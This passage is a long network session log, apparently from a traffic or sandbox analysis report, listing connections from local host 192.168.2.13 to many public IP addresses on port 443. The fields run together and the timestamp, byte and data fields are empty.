                                    13233192.168.2.1356466219.150.247.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13234192.168.2.134344280.144.226.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13235192.168.2.1358224203.168.62.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13236192.168.2.135362243.198.33.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13237192.168.2.1340940107.123.185.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13238192.168.2.134092613.151.96.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13239192.168.2.1352712195.206.131.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13240192.168.2.134482468.46.72.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13241192.168.2.1344026105.16.71.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13242192.168.2.1338080156.76.220.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13243192.168.2.1342392172.10.215.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13244192.168.2.134952288.98.26.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13245192.168.2.1354582157.78.29.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13246192.168.2.133294479.51.175.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13247192.168.2.134508498.52.193.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13248192.168.2.133761899.144.171.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13249192.168.2.1358958118.80.49.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13250192.168.2.134695486.174.99.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13251192.168.2.135633439.227.192.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13252192.168.2.1355378178.7.203.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13253192.168.2.133833841.134.74.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13254192.168.2.135835258.150.17.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13255192.168.2.1353374170.153.169.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13256192.168.2.1336290117.246.144.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13257192.168.2.1354534175.47.95.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13258192.168.2.1349434131.235.121.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13259192.168.2.133898685.14.36.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13260192.168.2.134147043.45.208.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13261192.168.2.1339768140.244.3.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13262192.168.2.1335110154.31.31.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13263192.168.2.1336940172.156.90.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13264192.168.2.134570459.148.166.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13265192.168.2.1359314149.212.243.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13266192.168.2.1354820171.87.184.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13267192.168.2.1351922171.124.62.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13268192.168.2.13575008.174.27.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13269192.168.2.1356884165.245.151.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13270192.168.2.133619498.180.174.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13271192.168.2.13587942.166.120.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13272192.168.2.1334436201.60.19.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13273192.168.2.133651285.245.246.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13274192.168.2.134657065.83.243.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13275192.168.2.134507087.105.140.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13276192.168.2.1344026172.6.247.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13277192.168.2.1335476151.59.54.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13278192.168.2.1339992158.116.226.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13279192.168.2.1344596158.69.17.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13280192.168.2.134339889.51.65.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13281192.168.2.1339628222.250.82.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13282192.168.2.135376666.152.247.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13283192.168.2.1358994115.106.95.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13284192.168.2.1357888122.157.39.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13285192.168.2.1339298139.113.231.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13286192.168.2.1356760150.71.169.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13287192.168.2.134738691.210.88.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13288192.168.2.135179827.122.31.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13289192.168.2.1350498183.119.232.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13290192.168.2.134856699.192.43.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13291192.168.2.1341284114.96.203.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13292192.168.2.1335846150.199.192.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13293192.168.2.134526651.14.228.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13294192.168.2.1358034144.67.82.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13295192.168.2.1336776208.254.68.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13296192.168.2.1341684121.209.202.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13297192.168.2.1352326132.234.28.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13298192.168.2.1334008102.60.42.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13299192.168.2.134355464.9.23.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13300192.168.2.134669080.230.220.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13301192.168.2.135025871.178.135.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13302192.168.2.1347250154.208.22.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13303192.168.2.1343784160.1.252.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13304192.168.2.1348786105.16.81.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13305192.168.2.134652845.145.7.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13306192.168.2.135202218.151.42.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13307192.168.2.134621025.84.224.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13308192.168.2.134534294.94.160.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13309192.168.2.1352816145.90.175.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13310192.168.2.1357238157.188.125.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13311192.168.2.1334068216.149.33.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13312192.168.2.1356540179.55.131.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13313192.168.2.1357576132.169.33.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13314192.168.2.1354830213.51.37.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13315192.168.2.135967037.201.114.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13316192.168.2.1342678181.24.166.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13317192.168.2.1344100197.136.131.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13318192.168.2.1334436137.109.150.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13319192.168.2.1344550110.111.116.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13320192.168.2.1347848186.218.146.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13321192.168.2.1343974152.131.182.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13322192.168.2.135308650.249.195.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13323192.168.2.135639675.176.226.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13324192.168.2.1333076117.64.44.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13325192.168.2.133820090.8.204.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13326192.168.2.133861013.73.152.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13327192.168.2.1348048100.60.194.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13328192.168.2.1349490161.91.206.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13329192.168.2.1357828166.173.46.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13330192.168.2.134330612.4.154.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13331192.168.2.134859651.157.158.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13332192.168.2.1353400120.174.120.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13333192.168.2.1334620183.9.104.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13334192.168.2.1357706174.37.181.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13335192.168.2.1333606194.184.136.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13336192.168.2.1358750166.173.151.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13337192.168.2.1340978205.65.135.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13338192.168.2.1360038144.207.51.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13339192.168.2.134434820.232.172.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13340192.168.2.1358060213.217.130.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13341192.168.2.136085459.4.37.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13342192.168.2.1335714148.230.40.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13343192.168.2.1349832171.193.218.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13344192.168.2.1345064202.159.26.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13345192.168.2.134332492.41.171.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13346192.168.2.1349514209.114.89.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13347192.168.2.1349042100.173.237.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13348192.168.2.135757263.76.214.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13349192.168.2.135444278.229.61.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13350192.168.2.1340608220.193.183.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13351192.168.2.1359224162.20.199.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13352192.168.2.134900469.27.17.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13353192.168.2.133809627.157.24.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13354192.168.2.135220888.80.42.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13355192.168.2.134428260.207.237.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13356192.168.2.1338474167.182.138.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13357192.168.2.135097857.242.163.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13358192.168.2.13423848.242.228.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13359192.168.2.1347126136.138.2.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13360192.168.2.1347248181.177.198.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13361192.168.2.1345398130.222.17.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13362192.168.2.1350892207.63.1.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13363192.168.2.135723085.118.135.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13364192.168.2.134922036.149.99.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13365192.168.2.1342284121.75.7.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13366192.168.2.1350328126.237.137.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13367192.168.2.1346884184.72.52.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13368192.168.2.134383848.74.44.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13369192.168.2.13373849.105.169.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13370192.168.2.134699680.46.198.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13371192.168.2.134862261.100.142.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13372192.168.2.1338228167.46.191.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13373192.168.2.135608077.50.57.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13374192.168.2.1342904152.250.16.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13375192.168.2.135402079.162.24.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13376192.168.2.1337636121.123.62.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13377192.168.2.133713865.34.231.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13378192.168.2.13442685.176.187.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13379192.168.2.1349044135.132.156.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13380192.168.2.134315295.109.57.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13381192.168.2.135905832.3.131.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13382192.168.2.135090641.83.166.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13383192.168.2.134617683.72.175.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13384192.168.2.1347216150.217.4.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13385192.168.2.135494852.133.112.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13386192.168.2.133975636.27.250.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13387192.168.2.1358490174.104.98.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13388192.168.2.1345494104.24.44.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13389192.168.2.1338204177.204.138.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13390192.168.2.135600625.251.51.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13391192.168.2.134204272.34.84.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13392192.168.2.1333702202.35.34.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13393192.168.2.135108072.193.46.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13394192.168.2.135854494.253.49.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13395192.168.2.1355696184.134.74.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13396192.168.2.134261893.228.165.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13397192.168.2.135340240.61.141.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13398192.168.2.1339560153.205.173.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13399192.168.2.1340132120.211.65.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13400192.168.2.1358534132.228.3.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13401192.168.2.1352704147.34.109.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13402192.168.2.1350366120.161.24.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13403192.168.2.1342826121.251.164.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13404192.168.2.1352360153.112.67.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13405192.168.2.135184046.94.58.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13406192.168.2.133967893.151.178.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13407192.168.2.1351214147.148.170.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13408192.168.2.1355492197.63.19.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13409192.168.2.1360220125.34.69.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13410192.168.2.1346322190.219.214.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13411192.168.2.1346182147.129.123.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13412192.168.2.1341336175.8.129.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13413192.168.2.1333488174.124.100.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13414192.168.2.1360970180.51.178.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13415192.168.2.1345344176.10.0.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13416192.168.2.1351218134.141.5.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13417192.168.2.134758069.54.161.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13418192.168.2.1347832195.111.84.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13419192.168.2.1349706192.155.61.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13420192.168.2.1337036183.58.85.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13421192.168.2.1339692144.226.83.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13422192.168.2.1356062199.120.239.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13423192.168.2.1342388174.175.185.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13424192.168.2.135601859.227.217.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13425192.168.2.133956835.136.127.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13426192.168.2.1356838153.29.161.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13427192.168.2.1352016142.228.224.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13428192.168.2.133862675.44.67.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13429192.168.2.1347368105.173.119.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13430192.168.2.1346184107.33.159.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13431192.168.2.135426295.33.208.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13432192.168.2.133620072.78.5.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13433192.168.2.134149650.180.53.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13434192.168.2.1358420196.60.120.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13435192.168.2.1352220213.80.185.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13436192.168.2.1344076166.136.223.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13437192.168.2.134547649.77.156.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13438192.168.2.1354464132.228.36.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13439192.168.2.1353256220.100.207.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13440192.168.2.1349034217.237.198.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13441192.168.2.135087242.211.175.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13442192.168.2.133508440.51.170.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13443192.168.2.1333716106.247.56.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13444192.168.2.133383057.185.101.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13445192.168.2.134659625.125.237.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13446192.168.2.1353124201.185.186.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13447192.168.2.1342924216.116.52.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13448192.168.2.135644643.39.201.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13449192.168.2.1354314210.122.150.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13450192.168.2.13407968.104.241.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13451192.168.2.1359984205.205.225.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13452192.168.2.135641024.73.125.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13453192.168.2.1338412143.26.83.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13454192.168.2.1352260173.195.112.226443
                                    TimestampBytes transferredDirectionData


